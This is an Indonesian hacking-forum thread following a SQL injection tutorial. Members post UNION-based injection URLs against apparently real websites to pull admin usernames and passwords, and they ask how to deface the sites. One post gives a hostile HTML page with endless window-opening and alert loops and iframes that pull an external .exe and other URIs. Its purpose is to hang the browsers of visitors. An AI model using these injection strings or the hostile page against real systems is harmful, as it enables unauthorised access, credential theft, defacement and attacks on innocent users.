[TUTORIAL] SQL Injection Pada PHP
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Re: [TUTORIAL]SQL Injection Pada PHP
sptnya yg ini dah lengkap, tp kok ttp g bs ?
http://www.vnrhcs.org/news_detail.php?i ... TABASE()--
whats wrong ?
http://www.vnrhcs.org/news_detail.php?i ... TABASE()--
whats wrong ?
Re: [TUTORIAL]SQL Injection Pada PHP
Mo tanya ni...
kalo dah dapet user + pass adminnya gimana cara defacenya om??
ni aq da koleksi user+pass adminnya
http://www.jaspal.com/news_detail.php?i ... m+tbuser--
kalo dah dapet user + pass adminnya gimana cara defacenya om??
ni aq da koleksi user+pass adminnya
http://www.jaspal.com/news_detail.php?i ... m+tbuser--
Re: [TUTORIAL]SQL Injection Pada PHP
sory rewrite, there is a wrong
this is my colection is true
----------------------------------
http://www.jaspal.com/news_detail.php?i ... m+tbuser--
----------------------------------
this is my colection is true
----------------------------------
http://www.jaspal.com/news_detail.php?i ... m+tbuser--
----------------------------------
Re: [TUTORIAL]SQL Injection Pada PHP
kang .
saya dapet yg versi 4 .
mohon pencerahan nya .
saya dapet yg versi 4 .
mohon pencerahan nya .
Re: [TUTORIAL]SQL Injection Pada PHP
Setelah Q ikuti step² gua ngedapati gini neh
setelah q masukkan
gimana kk'...
mohon bimbingan yak...?
Code: Select all
MySQL error 1222: The used SELECT statements have a different number of columns
Code: Select all
http://www.examplesaja.com.my/news/news_detail.php?id=-3+union+all+select+1,version(),3,4,5,6,7,8/*
mohon bimbingan yak...?
Saya tidak pinter, tidak jenius, apalagi disebut2 hebat..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
Re: [TUTORIAL]SQL Injection Pada PHP
exops wrote:sptnya yg ini dah lengkap, tp kok ttp g bs ?
http://www.vnrhcs.org/news_detail.php?i ... TABASE()--
whats wrong ?
ya jadi contoh tu SqL versi 5 > bro...
kalu versi 4 katanya agak sedikit beda gitu....nebak2 table ato gimana kurang tau gua...
Saya tidak pinter, tidak jenius, apalagi disebut2 hebat..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
Re: [TUTORIAL]SQL Injection Pada PHP
dapet juga neh.....
tapi sayang nya udah ada yang pernah masuk....
btw, cari login adminnya dimana ya...?
Code: Select all
http://www.signyband.com/news_detail.php?id=-6+union+all+select+1,2,GROUP_CONCAT(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+mod_tbluser--
btw, cari login adminnya dimana ya...?
Saya tidak pinter, tidak jenius, apalagi disebut2 hebat..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
/me hanya seorang yang pengen belajar memahami sesuatu yang sulit untuk dipecahkan..
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [TUTORIAL]SQL Injection Pada PHP
Waktu dibuka, pas sdh Loading separuh langsung di STOP, trus View Sourcex...al-carati wrote:@ Bwt bung x-shadow tolong dishare script bwt nyerang balik gituaries deris wrote:wkwkwkwkwk scriptnya XshadowBi4kKob4r wrote:perhatian aja...
hati2 dalam mencoba
soalnya banyak yang bikin serangan balik
contohnya
harap berdoa sebelum klik
wkwkwkwkwwk
iya tuh isa buat nyerang balik wkwkwkwkwkwkwk
coz ane jg pernah nyoba buka trus mozzila ane jd hang akhirnya ane tekan ctrl+alt+del aja bwt
ngilangin,salut bwt bung x-shadow
Code: Select all
<html>
<head>
<script language='javascript'>
function stayHere(){
alert('fvck y0u');
while(1<2){
window.open("index.php");
}
}
</script>
</head>
<body onunload="stayHere()">
//Baris ini dicopy sebanyak2x, mulai dari baris di bawah sampai...
<IFRAME ONLOAD="alert('fvck y0u')" SRC="mailto:[email protected]?subject=jancuk jaran&body=fvck y0u full"></IFRAME>
<iframe id=xx src="http://cc.shu.edu.tw/~download/rar/wrar35b6tc.exe">
<iframe id=xx src="ymsgr:sendim?kena6">
<iframe id=xx src="telnet://192.168.1.100">
<iframe id=fvck src="irc://irc.theoneserv.net:6668">
<script language='javascript'>
while(1<2) {
setTimeout(alert('fvck y0u'), 1000);
window.open("index.php");
}
</script>
//Sampai baris di atas...
</body>
</html>
...n0 l1m17...
Re: [TUTORIAL]SQL Injection Pada PHP
masalah di hexadecimal_sql
ada yg mau bantu ....?
ada yg mau bantu ....?
-
- Posts: 17
- Joined: Tue Jul 21, 2009 11:54 am
Re: [TUTORIAL]SQL Injection Pada PHP
maksudnya hexadecimal dari "Cumi234"Cumi234 wrote:masalah di hexadecimal_sql
ada yg mau bantu ....?
nih 0x43756d69323334